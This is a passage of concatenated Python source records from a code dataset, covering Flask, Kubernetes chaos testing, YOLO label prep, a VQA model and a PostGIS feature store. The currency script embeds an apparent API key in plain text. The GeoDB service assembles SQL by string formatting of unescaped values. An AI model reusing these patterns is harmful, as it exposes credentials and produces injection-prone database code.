n\")\n\tprint(\"Show graphs: g\")\n\tprint(\"Exit: q\\n\")\n\treturn raw_input(\">>> \")\t\n\n'''\nstatus = menu()\ngraphs = []\nwhile(status != \"q\"):\n\tif status == \"n\":\n\t\tgraphs.append(lib.newGraphAM(c_uint(5),c_uint(4)))\n\telif status == \"g\":\n\t\tfor i in graphs:\n\t\t\tshow(i)\n\t\t\tprint(\"\")\n\tstatus = menu()'''\n\t\ngraph = lib.newEdgeGraphAM(c_uint(5),c_uint(4))\nprint(\"GraphAM:\")\nshow(graph)\n#TEST:\n'''graph = lib.AM_to_IM(graph)\nprint(\"AM_to_IM:\")\nshow(graph)\ngraph = lib.IM_to_AM(graph)\nprint(\"IM_to_AM:\")\nshow(graph)\ngraph = lib.AM_to_AL(graph)\nprint(\"AM_to_AL:\")\nshow(graph)\ngraph = lib.AL_to_IM(graph)\nprint(\"AL_to_IM:\")\nshow(graph)\ngraph = lib.IM_to_AL(graph)\nprint(\"IM_to_AL:\")\nshow(graph)\ngraph = lib.AL_to_AM(graph)\nprint(\"AL_to_AM:\")\nshow(graph)'''\n\nsave(graph)\n\ndraw(graph)\ngraph = lib.newGraphDrawer(graph)\t\n\nb = raw_input(\"Narysowac graf?(y/n)\")\nif b==\"y\":\n\tdraw(graph)\n\n\n","sub_path":"graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"590362885","text":"#!/usr/bin/env python3\n# __@@__ Coding:utf-8\n\n\"\"\"\n@version: ??\n@author: luxutao\n@licence: Apache Licence\n@contact: xutao.lu.cn@gmail.com\n@site: http://www.123m.me\n@filename: workerManager.py\n@projectname: PycharmProjects\n@time: 2016-8-27 下午12:57\n\"\"\"\n\nimport time,random,queue\nfrom multiprocessing.managers import BaseManager\n\nBaseManager.register('get_task_queue')\nBaseManager.register('result_task_queue')\n\nserver_ip = '127.0.0.1'\nport = 5000\nprint('Connect to server %s ' % server_ip)\n\nm = BaseManager(address=(server_ip,port),authkey=b'abc')\n\nm.connect()\ntask = m.get_task_queue()\nresult = m.result_task_queue()\n\nfor i in range(10):\n try:\n n = task.get(timeout=1)\n print('run task %d * %d' % (n,n))\n r = '%d * %d = %d' % (n,n,n * n)\n time.sleep(1)\n result.put(r)\n except queue.Empty:\n print('task queue is empty')\nprint('worker exit')","sub_path":"process_and_thead/workerManager.py","file_name":"workerManager.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"183006844","text":"import json\n\nfrom flask import Flask, request\nfrom pymongo import MongoClient\nfrom bson import json_util\n\n\napp = Flask(__name__)\n\n\nclient = MongoClient('localhost', 27017)\ndb = client['twitter_db']\ncollection = db['twitter_collection']\n\n\ndef to_json(data):\n return json.dumps(data, default=json_util.default)\n\n\n@app.route('/tweets', methods=['GET'])\ndef tweets():\n if request.method == 'GET':\n results = collection.find()\n json_results = []\n for result in results:\n json_results.append(result)\n return to_json(json_results)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"flaskapi.py","file_name":"flaskapi.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"39947543","text":"import requests\n\nmoney=int(input(\"enter Dollars: \"))\n\nurl=\"https://currencyapi.net/api/v1/rates?key=AZcoollxIoPSPU9G5GeS6rsOtf9odRYRATKw\"\n\nrespnse=requests.get(url)\ndata=respnse.json()\n\nprint(\"$\",money,\"=\",\"Rs\",money*data[\"rates\"][\"INR\"])\n\n\n","sub_path":"doubts-7/usd_to_inr.py","file_name":"usd_to_inr.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"306108534","text":"import pandas as pd\nimport re\nimport jieba.analyse\nfrom wordcloud import WordCloud\nfrom matplotlib import pyplot as plt\n\n\"\"\"\n 创建词云\n\"\"\"\n\ndef data_clean(path):\n \"\"\"\n 获取数据,进行数据处理\n :param path: 数据路径\n :return: 返回清洗后的数据-- 好友签名\n \"\"\"\n names = [\"nickname\", \"name\", \"gender\", \"province\", \"city\", \"signature\", \"attrStatus\"]\n data = pd.read_csv(path, header=None, names=names)\n # print(data.head())\n\n signature = data[\"signature\"] # 获取所有签名的数据\n signature = signature.dropna() # 删除空签名\n\n word = \"\"\n for i in signature:\n # i = '随遇而安️' # 测试替换成功\n if \"<\" or \">\" in i:\n i = re.sub(r\"<.*?>\", \"\", i)\n i = \" \".join(jieba.analyse.extract_tags(i, 5)) # 基于TF-IDF 算法的关键词抽取\n word += i\n\n return word\n\ndef creat_wordcloud(word):\n \"\"\"\n 创建词云图\n :param word: 需要生产词云的文本\n :return: None\n \"\"\"\n # 读取图片背景\n background = plt.imread(\"1.png\")\n\n # 设置词云样式\n word_style = WordCloud(font_path=\"/usr/share/fonts/truetype/arphic/ukai.ttc\", # 设置字体\n background_color=\"lightpink\", # 设置背景颜色\n max_words=200, # 设置显示词云的数量\n mask=background) # 背景图\n\n # 将词汇导入\n word_style.generate(word)\n\n # 存储词云图\n word_style.to_file(\"2.png\")\n\n\nif __name__ == '__main__':\n path = \"friends.csv\"\n # 1.数据处理\n word = data_clean(path)\n # 2.词云生产\n creat_wordcloud(word)\n","sub_path":"Project/wechat/wechat_word.py","file_name":"wechat_word.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"637133842","text":"# This is a sample Python script.\r\n\r\n# Press Shift+F10 to execute it or replace it with your code.\r\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\r\n\r\n\r\ndef print_hi(name):\r\n # Use a breakpoint in the code line below to debug your script.\r\n print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint.\r\n ans= count_iter(\"My name is Saurabh what's your\",\"a\")\r\n print(ans)\r\n\r\ndef count_iter(string,char):\r\n if not string:\r\n ans =0\r\n elif char == string[0]:\r\n ans = 1 + count_iter(string[1:], char)\r\n else:\r\n ans = count_iter(string[1:], char)\r\n return ans\r\n\r\n\r\n\r\n\r\n# Press the green button in the gutter to run the script.\r\nif __name__ == '__main__':\r\n print_hi('PyCharm')\r\n\r\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\r\n","sub_path":"pythonProject/recursion1.py","file_name":"recursion1.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"214246620","text":"import pygame\nimport pymunk\nimport math\nfrom pymunk import Vec2d\n\n# Screen size\nwidth, height = 1200,600\n\n# Table dimensions\nscaling = 7\ntable_width = int(160*scaling) #Playable area\ntable_height = int(70*scaling) #Playable area\npuck_radius = int(7/2*scaling)\npusher_radius = int(9.6/2*scaling)\ngoal_size = 30*scaling\n\n# wall varaibles\nwall_thickness = 10\n\n# Outer values\nleft = (width-table_width-2*wall_thickness)/2\nright = width-left\ntop = (height-table_height-2*wall_thickness)/2\nbottom = height-top\n\n# Puck center reachable positions\npuck_topPos = top + wall_thickness + puck_radius\npuck_bottomPos = bottom - wall_thickness - puck_radius\n\n# Pusher center reachable positions\npusher_distFromWall = 10 #The closest the pusher can get to the wall\npuck_leftPos = left + wall_thickness + pusher_distFromWall + pusher_radius #kanskje ligge til: + puck_radius\n\nimport joblib\nfrom pathlib import Path\npath = Path(__file__).parent\n\nmodel = joblib.load(path/'model.joblib')\ndef rotate_vel(velocity):\n angle_inn = velocity.angle\n angle_out = model.predict([[abs(angle_inn)]])[0][0]\n\n rotated_velocity = velocity\n if angle_inn < 0:\n rotated_velocity = velocity.rotated(-angle_inn+angle_out)\n\n if angle_inn > 0:\n rotated_velocity = velocity.rotated(-angle_inn-angle_out)\n\n return rotated_velocity\n\ndef path_points(puck_velocity,puck_pos):\n\n P = puck_pos\n last_velocity = puck_velocity\n totalTime = 0\n t = 0\n points = []\n calculate = False\n while puck_velocity[0] < 0 and puck_pos[0] > puck_leftPos:\n points.append(puck_pos)\n totalTime += t\n if puck_velocity[0] < 0 and puck_velocity[1] < 0:\n t = (puck_topPos - puck_pos[1])/puck_velocity[1]\n Px = puck_pos[0] + puck_velocity[0]*t\n\n\n puck_pos = [Px,puck_topPos]\n last_velocity = puck_velocity\n puck_velocity = rotate_vel(puck_velocity)\n calculate = True\n\n elif puck_velocity[0] <= 0 and puck_velocity[1] > 0:\n t = (puck_bottomPos - puck_pos[1])/puck_velocity[1]\n Px = puck_pos[0] + puck_velocity[0]*t\n\n puck_pos = [Px,puck_bottomPos]\n last_velocity = puck_velocity\n puck_velocity = rotate_vel(puck_velocity)\n calculate = True\n\n\n if calculate:\n t = (puck_leftPos-points[-1][0])/last_velocity[0]\n totalTime += t\n\n Py = points[-1][1]+last_velocity[1]*t\n \n puck_pos = [puck_leftPos,Py]\n points.append(puck_pos)\n \n else:\n points.append(puck_pos)\n\n \n #print(points)\n return points","sub_path":"Simulator/Testing/Bot/Puck_path/puck_path2.py","file_name":"puck_path2.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"492706158","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 08 19:06:33 2018\n\nauthor: Akshita Gupta\n\"\"\"\nfrom get_data import get_metadata, prepare_embeddings, get_train_data, get_test_data\nfrom my_models import san_atten\nimport numpy as np\n\nroot_path = 'E:/akshita_workspace/cc/Audio-Vision/VQA/Stacked Attention/data/'\nval_file = root_path + 'mscoco_val2014_annotations.json'\ninput_json = root_path + 'vqa_data_prepro.json' # Vocab and answers \ninput_img_train_h5 = root_path + 'img_train_2.h5' #Images train features\ninput_img_test_h5 = root_path + 'img_test_2.h5' #Images test features\ninput_ques_h5 = root_path + 'vqa_data_prepro.h5' #Question features\n\n\ncommon_word_emb_dim = 512\nword_emb_dim = 300\nembedding_matrix_filename = root_path + 'embeddings_%s.h5'%word_emb_dim\nglove_path = root_path + 'glove.6B.300d.txt'\nimg_norm = 1\nnb_classes = 1000\noptimizer = 'sgd'\nbatch_size = 20\nepochs = 4\nactivation_1 = 'tanh'\nactivation_2 = 'tanh'\ndropout = 0.5\nvocabulary_size = 15107\nnum_hidden_units_lstm = 512\nmax_ques_length = 26\nnum_hidden_layers_mlp = 3\nnum_hidden_units_mlp = 512\nclass_activation = 'sigmoid'\nimg_vec_dim = 4096\nfilter_sizes = [128,256,256]\nnum_attention_layers = 1\n\n\nmetadata=get_metadata(input_json)\n\n#embedding_matrix = prepare_embeddings(vocabulary_size, word_emb_dim, metadata, embedding_matrix_filename, glove_path)\n#print(embedding_matrix.shape)\nmodel= san_atten(common_word_emb_dim,img_vec_dim, activation_1,activation_2, dropout, vocabulary_size,\n num_hidden_units_lstm, max_ques_length,\n word_emb_dim, num_hidden_layers_mlp,\n num_hidden_units_mlp, nb_classes, class_activation,filter_sizes,num_attention_layers)\nmodel.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\nmodel.summary() # prints model layers with weights\n\ntrain_X, train_Y= get_train_data(input_img_train_h5, input_ques_h5)\n\ntest_X,test_Y, multi_val_y=get_test_data(input_img_test_h5, input_ques_h5,metadata,val_file)\n\nmodel.fit(train_X, train_Y, batch_size = batch_size, epochs=epochs, validation_data=(test_X, test_Y),verbose=1)\n\nprint (\"Evaluating Accuracy on validation set:\")\nmetric_vals = model.evaluate(test_X, test_Y)\nprint (\"\")\nfor metric_name, metric_val in zip(model.metrics_names, metric_vals):\n print (metric_name, \" is \", metric_val)\n\n# Comparing prediction against multiple choice answers\ntrue_positive = 0\npreds = model.predict(test_X)\npred_classes = [np.argmax(_) for _ in preds]\nfor i, _ in enumerate(pred_classes):\n if _ in multi_val_y[i]:\n true_positive += 1\nprint (\"true positive rate: \", np.float(true_positive)/len(pred_classes))\n","sub_path":"VQA/Stacked Attention/mainfile.py","file_name":"mainfile.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"221672763","text":"from chaoslib.types import Secrets\nfrom kubernetes import client\nfrom logzero import logger\n\nfrom chaosk8s import create_k8s_api_client\n\n__all__ = [\"delete_replica_set\"]\n\n\ndef delete_replica_set(name: str, ns: str = \"default\",\n label_selector: str = \"name in ({name})\",\n secrets: Secrets = None):\n \"\"\"\n Delete a replica set by `name` in the namespace `ns`.\n\n The replica set is deleted without a graceful period to trigger an abrupt\n termination.\n\n The selected resources are matched by the given `label_selector`.\n \"\"\"\n label_selector = label_selector.format(name=name)\n api = create_k8s_api_client(secrets)\n v1 = client.ExtensionsV1beta1Api(api)\n if label_selector:\n ret = v1.list_namespaced_replica_set(ns, label_selector=label_selector)\n else:\n ret = v1.list_namespaced_replica_set(ns)\n\n logger.debug(\"Found {d} replica sets named '{n}'\".format(\n d=len(ret.items), n=name))\n\n body = client.V1DeleteOptions()\n for r in ret.items:\n v1.delete_namespaced_replica_set(r.metadata.name, ns, body=body)\n","sub_path":"chaosk8s/replicaset/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"566811442","text":"import pandas as pd\nimport os\n\"\"\"\ntrain-annotations-bbox.csv will be downloaded if you go through point Dataset Used Under Implementation of this project\nin readme File\n\"\"\"\n# Reference for this code can be taken from https://github.com/WyattAutomation/Train-YOLOv3-with-OpenImagesV4\nf=pd.read_csv(\"/yolo_model/darknet_tuned/OIDv4_ToolKit/OID/csv_folder/train-annotations-bbox.csv\")\n\"\"\"\nThere is another files downloaded (if you go through point Dataset Used Under Implementation of this project) called\nas class-descriptions-boxable.csv. From this file the code for pizza is/m/0663v\n\"\"\"\nnumClasses = ['/m/0663v']\nu = f.loc[f['LabelName'].isin(numClasses)]\nkeep_col = ['LabelName','ImageID','XMin','XMax','YMin','YMax']\nnew_f = u[keep_col]\nnew_f['ClassNumber'] = new_f['LabelName']\nnew_f.loc[new_f['LabelName'] == '/m/0663v', 'ClassNumber'] = 1\nnew_f['width'] = new_f['XMax'] - new_f['XMin']\nnew_f['height'] = new_f['YMax'] - new_f['YMin']\nnew_f['x'] = (new_f['XMax'] + new_f['XMin'])/2\nnew_f['y'] = (new_f['YMax'] + new_f['YMin'])/2\nkeep_col = ['ClassNumber','ImageID','x','y','width','height']\nnew_f_2 = new_f[keep_col]\n\nfor root, dirs, files in os.walk(\".\"):\n\tfor filename in files:\n\t\tif filename.endswith(\".jpg\"):\n\t\t\tfn = filename[:-4]\n\t\t\tnf = new_f_2.loc[new_f_2['ImageID'] == fn]\n\t\t\tkeep_col = ['ClassNumber','x','y','width','height']\n\t\t\tnew_nf = nf[keep_col]\n\t\t\tprint(new_nf)\n \t\t# saving the txt file containing all the labels for pizza images\n\t\t\timgpath = \"/yolo_model/darknet_tuned/OIDv4_ToolKit/OID/Dataset/train/Pizza_labels/\" + fn + \".txt\"\n\t\t\tprint(imgpath)\n\t\t\tnew_nf.to_csv(imgpath, index=False, header=False, sep=' ')\n","sub_path":"pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"290318128","text":"# The MIT License (MIT)\n# Copyright (c) 2019 by the xcube development team and contributors\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\n# of the Software, and to permit persons to whom the Software is furnished to do\n# so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport os\nimport os.path\nfrom abc import abstractmethod, ABCMeta\nfrom typing import Optional, Sequence, Dict, Any, Union\nimport fiona as fio\nimport psycopg2\nimport geopandas as gpd\nimport json\n\n\nFeature = Dict[str, Any]\nSchema = Dict[str, Any]\nBBox = Sequence\n\n\nclass GeoDBService(metaclass=ABCMeta):\n\n @abstractmethod\n def find_feature(self, collection_name: str, query: str, fmt: str = 'geojson', bbox: BBox = None,\n bbox_mode: str = 'contains', bbox_crs: int = 4326) -> Optional[Feature]:\n \"\"\"\n\n :param fmt: format of return type\n :param bbox_crs: The CRS (SRID) of the bbox. It has to match the SRID of the targeted collection\n :param bbox_mode: Can be 'contains' or 'within'. Refer to https://postgis.net/docs/ST_Within.html and\n https://postgis.net/docs/ST_Contains.html\n :param bbox: bbox as array [minx, miny, maxx, maxy]\n :param collection_name:\n :param query: a query to filter features from all collections\n \"\"\"\n\n @abstractmethod\n def find_features(self, collection_name: str, query: str = None, max_records: int = -1, fmt: str = 'geopandas',\n bbox: BBox = None, bbox_mode: str = 'contains', bbox_crs: int = 4326) -> \\\n Union[Sequence[Feature], gpd.GeoDataFrame]:\n \"\"\"\n\n :param bbox_crs: The CRS (SRID) of the bbox. It has to match the SRID of the targeted collection\n :param bbox_mode: bbox_mode: Can be 'contains' or 'within'. Refer to https://postgis.net/docs/ST_Within.html\n and https://postgis.net/docs/ST_Contains.html\n :param bbox: bbox as array [minx, miny, maxx, maxy]\n :param collection_name: Name of the collection\n :param fmt: format of return type\n :param query: a query to filter features from all collections\n :param max_records: maximum number of records to be returned\n \"\"\"\n\n @abstractmethod\n def new_collection(self, collection_name: str, schema: Schema):\n \"\"\"\n\n :param collection_name: a name for teh new collection\n :param schema: a feature schema\n \"\"\"\n\n @abstractmethod\n def drop_collection(self, collection_name: str):\n \"\"\"\n\n :param collection_name: a name for teh new collection\n \"\"\"\n\n @abstractmethod\n def add_feature(self, collection_name: str, feature: Feature) -> str:\n \"\"\"\n\n :param collection_name: the name of the collection the feature will be added to\n :param feature: a feature to be added\n \"\"\"\n\n @abstractmethod\n def add_features(self, collection_name: str, features: Sequence[Feature]) -> str:\n \"\"\"\n\n :param collection_name: the name of the collection the features will be added to\n :param features: a list of features to be added\n \"\"\"\n pass\n\n\nclass LocalGeoDBService(GeoDBService):\n\n def __init__(self):\n super().__init__()\n\n def find_feature(self, collection_name: str, query: str, fmt: str = 'geojson', bbox: BBox = None,\n bbox_mode: str = 'contains', bbox_crs: int = 4326) -> Optional[Feature]:\n\n features = self.find_features(collection_name, query, bbox=bbox, bbox_crs=bbox_crs, fmt=fmt,\n bbox_mode=bbox_mode, max_records=1)\n return features[0] if features else None\n\n def find_features(self, collection_name: str, query: str = None, max_records: int = -1, fmt: str = 'geopandas',\n bbox: BBox = None, bbox_mode: str = 'contains', bbox_crs: int = 4326) -> \\\n Union[Sequence[Feature], gpd.GeoDataFrame]:\n\n if bbox:\n raise NotImplementedError(\"bbox feature not implemented for driver local\")\n\n compiled_query = compile(query, 'query', 'eval')\n result_set = []\n\n collection = self._get_collection(collection_name)\n for feature in collection:\n # noinspection PyBroadException\n try:\n _locals = dict(id=feature.get('id')) if feature.get('id') else {}\n _locals.update(feature.get('properties', {}))\n result = eval(compiled_query, None, _locals)\n except Exception:\n result = False\n if result:\n result_set.append(feature)\n if len(result_set) >= max_records:\n break\n return result_set\n\n def new_collection(self, collection_name: str, schema: Schema):\n raise NotImplementedError(\"new_collection not yet implemented\")\n\n def drop_collection(self, collection_name: str):\n raise NotImplementedError(\"drop_collection not yet implemented\")\n\n def add_feature(self, collection_name: str, feature: Feature) -> str:\n raise NotImplementedError(\"add_feature not yet implemented\")\n\n def add_features(self, collection_name: str, features: Sequence[Feature]) -> str:\n raise NotImplementedError(\"new_collection not yet implemented\")\n\n # noinspection PyMethodMayBeStatic\n def _get_collection(self, collection_name: str):\n source_path = os.path.normpath(os.path.join(os.path.dirname(__file__), '..', 'geodb'))\n file_path = os.path.join(source_path, collection_name + '.geojson')\n if os.path.isfile(file_path):\n return fio.open(file_path)\n else:\n raise FileNotFoundError(f\"Could not find file {collection_name}.geojson\")\n\n\n# noinspection SqlNoDataSourceInspection,PyMethodMayBeStatic\nclass RemoteGeoPostgreSQLService(GeoDBService):\n _FILTER_SQL = (\"SELECT json_build_object(\\n\"\n \" 'type', 'Feature',\\n\"\n \"\t 'properties', properties::json,\\n\"\n \" 'geometry', ST_AsGeoJSON(geometry)::json\\n\"\n \" )\\n\"\n \" FROM \\\"{table_prefix}{collection}\\\" \\n\"\n \" WHERE {query} {max}\")\n\n _FILTER_LONG_SQL = (\"SELECT *\\n\"\n \" FROM \\\"{table_prefix}{collection}\\\" \\n\"\n \" WHERE {query} {max}\")\n\n _GET_TABLES_SQL = (\"SELECT t.table_name\\n\"\n \" FROM information_schema.tables t\\n\"\n \" INNER JOIN information_schema.columns c on c.table_name = t.table_name \\n\"\n \" and c.table_schema = t.table_schema\\n\"\n \" WHERE c.column_name = 'properties'\\n\"\n \" AND t.table_schema not in ('information_schema', 'pg_catalog')\\n\"\n \" AND t.table_type = 'BASE TABLE'\\n\"\n \" \\n\"\n \" ORDER BY t.table_schema;\")\n\n _TABLE_EXISTS_SQL = (\"SELECT EXISTS (\\n\"\n \" SELECT 1\\n\"\n \" FROM information_schema.tables\\n\"\n \" WHERE table_schema = 'public'\\n\"\n \" AND table_name = '{table_prefix}{collection}')\")\n\n _DROP_COLLECTION_SQL = \"DROP TABLE {table_prefix}{collection}\"\n\n _CREATE_COLLECTION_SQL = (\"\\n\"\n \" -- Table: public.{table_prefix}{collection}\\n\"\n \"\\n\"\n \" -- DROP TABLE public.{table_prefix}{collection};\\n\"\n \" \\n\"\n \" CREATE TABLE public.{table_prefix}{collection}\\n\"\n \" (\\n\"\n \" -- Inherited from table public.{table_prefix}master: \"\n \"id integer NOT NULL DEFAULT nextval('{table_prefix}id_seq1'::regclass),\\n\"\n \" -- Inherited from table public.{table_prefix}master: properties json,\\n\"\n \" -- Inherited from table public.{table_prefix}master: \"\n \"name character varying(512) COLLATE pg_catalog.\\\"default\\\",\\n\"\n \" -- Inherited from table public.{table_prefix}master: \"\n \"geometry geometry,\\n\"\n \" -- Inherited from table public.{table_prefix}master: \"\n \"type character varying COLLATE pg_catalog.\\\"default\\\" NOT NULL\\n\"\n \" {columns}\\n\"\n \" )\\n\"\n \" INHERITS (public.{table_prefix}master)\\n\"\n \" WITH (\\n\"\n \" OIDS = FALSE\\n\"\n \" )\\n\"\n \" TABLESPACE pg_default;\\n\"\n \" \\n\"\n \" ALTER TABLE public.{table_prefix}{collection}\\n\"\n \" OWNER to postgres;\\n\"\n \" \")\n\n _GET_SRID_SQL = \"SELECT ST_SRID(geometry) FROM {collection} LIMIT 1;\"\n\n _TABLE_PREFIX = ''\n\n def __init__(self, host: str, user: Optional[str] = None, password: Optional[str] = None, port: int = 5432,\n conn: object = None):\n \"\"\"\n\n :param host: Host of database\n :param user: user name\n :param password: password\n :param port: port (default: 5432)\n \"\"\"\n super().__init__()\n\n if not user:\n user = os.getenv(\"PSQL_USER\")\n if not password:\n password = os.getenv(\"PSQL_PASSWD\")\n\n if conn:\n self._conn = conn\n else:\n self._conn = psycopg2.connect(f\"host={host} port={port} user={user} password={password}\")\n\n self._collections = self._get_collections()\n self._sql = None\n\n @property\n def collections(self) -> Optional[Sequence[str]]:\n return self._collections\n\n @property\n def sql(self) -> str:\n return self._sql\n\n def find_feature(self, collection_name: str, query: str, fmt: str = 'geojson', bbox: BBox = None,\n bbox_mode: str = 'contains', bbox_crs: int = 4326) -> Optional[Feature]:\n features = self.find_features(collection_name, query, bbox=bbox, fmt=fmt, bbox_mode=bbox_mode, max_records=1)\n return features[0] if features else None\n\n def _get_srid_from_collection(self, collection_name: str) -> str:\n sql = self._GET_SRID_SQL.format(collection=collection_name)\n result = self.query(sql=sql)\n return result[0]\n\n def _alter_query(self, query, bbox, bbox_mode, fmt, srid: int = None):\n bbox_query = None\n if bbox:\n minx = bbox[0]\n miny = bbox[1]\n maxx = bbox[2]\n maxy = bbox[3]\n\n srid_str = ''\n if srid is not None:\n srid_str = f'SRID={srid};'\n\n bbox = f\" {srid_str}POLYGON(({minx} {miny},{minx} {maxy},{maxx} {maxy},{maxx} {miny},{minx} {miny}))\" \\\n f\"::geometry\"\n if bbox_mode == 'contains':\n bbox_query = f\" ST_Contains('{bbox}', geometry)\"\n elif bbox_mode == 'within':\n bbox_query = f\" ST_Within('{bbox}', geometry)\"\n else:\n raise ValueError(f\"bbox_mode {bbox_mode} unknown\")\n\n if not query and not bbox_query:\n query = 'TRUE'\n elif query and not bbox_query:\n if fmt == 'geojson':\n query = f\"properties->>{query}\"\n elif fmt == 'geopandas':\n query = f\"{query}\"\n else:\n raise ValueError(f\"format {fmt} not known\")\n elif not query and bbox_query:\n query = bbox_query\n elif query and bbox_query:\n if fmt == 'geojson':\n query = f\"properties->>{query} and {bbox_query}\"\n elif fmt == 'geopandas':\n query = f\"{query} and {bbox_query}\"\n else:\n raise ValueError(f\"format {fmt} not known\")\n return query\n\n def find_features(self, collection_name: str, query: str = None, max_records: int = -1, fmt: str = 'geopandas',\n bbox: BBox = None, bbox_mode: str = 'contains', bbox_crs: int = 4326) -> \\\n Union[Sequence[Feature], gpd.GeoDataFrame]:\n if not self._collection_exists(collection_name=collection_name):\n raise ValueError(f\"Collection {collection_name} not found\")\n\n limit = ''\n if max_records > -1:\n limit = 'LIMIT ' + str(max_records)\n\n query = self._alter_query(query=query, bbox=bbox, bbox_mode=bbox_mode, fmt=fmt, srid=bbox_crs)\n\n if fmt == 'geojson':\n self._sql = self._FILTER_SQL.format(collection=collection_name, max=limit, query=query,\n table_prefix=self._TABLE_PREFIX)\n cursor = self._conn.cursor()\n cursor.execute(self._sql)\n\n result_set = []\n for f in cursor.fetchall():\n result_set.append(f[0])\n return result_set\n elif fmt == 'geopandas':\n self._sql = self._FILTER_LONG_SQL.format(collection=collection_name, max=limit, query=query,\n table_prefix=self._TABLE_PREFIX)\n result = gpd.GeoDataFrame.from_postgis(self._sql, self._conn, geom_col='geometry')\n if result.empty:\n result = gpd.GeoDataFrame({'Message': ['empty result']})\n return result\n else:\n raise ValueError(f\"format {fmt} unknown\")\n\n def new_collection(self, collection_name: str, schema: Schema) -> str:\n if self._collection_exists(collection_name):\n raise ValueError(f\"Collection {collection_name} exists\")\n\n columns = []\n for k, v in schema['properties'].items():\n columns.append(self._make_column(k, v))\n\n sql = self._CREATE_COLLECTION_SQL.format(collection=collection_name, columns=',\\n'.join(columns),\n table_prefix=self._TABLE_PREFIX)\n self.query(sql)\n\n return \"Collection created\"\n\n def drop_collection(self, collection_name: str):\n if not self._collection_exists(collection_name=collection_name):\n raise ValueError(f\"Collection {collection_name} does not exist\")\n\n sql = self._DROP_COLLECTION_SQL.format(collection=collection_name, table_prefix=self._TABLE_PREFIX)\n self.query(sql=sql)\n\n def add_feature(self, collection_name: str, feature: Feature) -> str:\n self.add_features(collection_name, [feature])\n return \"Feature Added\"\n\n def add_features(self, collection_name: str, features: Sequence[Feature]) -> str:\n for f in features:\n\n _local = f['properties'].keys()\n columns = []\n for c in _local:\n columns.append(f'\"{c.lower()}\"')\n\n _local = f['properties'].values()\n values = []\n for v in _local:\n if isinstance(v, float) or isinstance(v, int) or isinstance(v, bool):\n values.append(f\"{v}\")\n elif v is None:\n values.append(f\"null\")\n else:\n values.append(f\"'{str(v)}'\")\n\n columns = ','.join(columns)\n values = ','.join(values)\n geometry = f['geometry']\n properties = f['properties']\n\n sql = f\"INSERT INTO {self._TABLE_PREFIX}{collection_name}(properties, name, {columns}, geometry) \" \\\n f\"VALUES('{json.dumps(properties)}', '{properties['S_NAME']}', {values}, \" \\\n f\"ST_GeomFromGeoJSON('{json.dumps(geometry)}')) \"\n self.query(sql=sql)\n return \"Features Added\"\n\n def query(self, sql: str) -> Optional[Any]:\n \"\"\"\n\n Args:\n sql: The raw SQL statement in PostgreSQL dialect\n\n Returns:\n A list of tuples if the number of returned rows is larger than one or a single tuple otherwise, or\n nothing if the query is not a SELECT statement\n\n\n \"\"\"\n cur = self._conn.cursor()\n cur.execute(sql)\n\n if \"SELECT\" in sql:\n if cur.rowcount == 1:\n result = cur.fetchone()\n else:\n result = cur.fetchall()\n else:\n self._conn.commit()\n result = True\n\n cur.close()\n return result\n\n def _get_collections(self):\n result = self.query(self._GET_TABLES_SQL)\n return [r[0] for r in result]\n\n def _collection_exists(self, collection_name: str):\n sql = self._TABLE_EXISTS_SQL.format(collection=collection_name, table_prefix=self._TABLE_PREFIX)\n return self.query(sql)[0]\n\n def _make_column(self, name: str, typ: str):\n if typ == 'str':\n col_create_str = f'{name} character varying(256) COLLATE pg_catalog.\"default\"'\n elif 'int' in typ:\n col_create_str = f'{name} integer'\n elif 'float' in typ:\n prec_str = \"\"\n _local = typ.split(':')\n if len(_local) == 2:\n _local = _local[1].split('.')\n if len(_local) == 2:\n prec_str = f\"({_local[0]},{_local[1]})\"\n col_create_str = f'{name} numeric{prec_str}'\n else:\n raise NotImplementedError(f\"Column type {typ} not 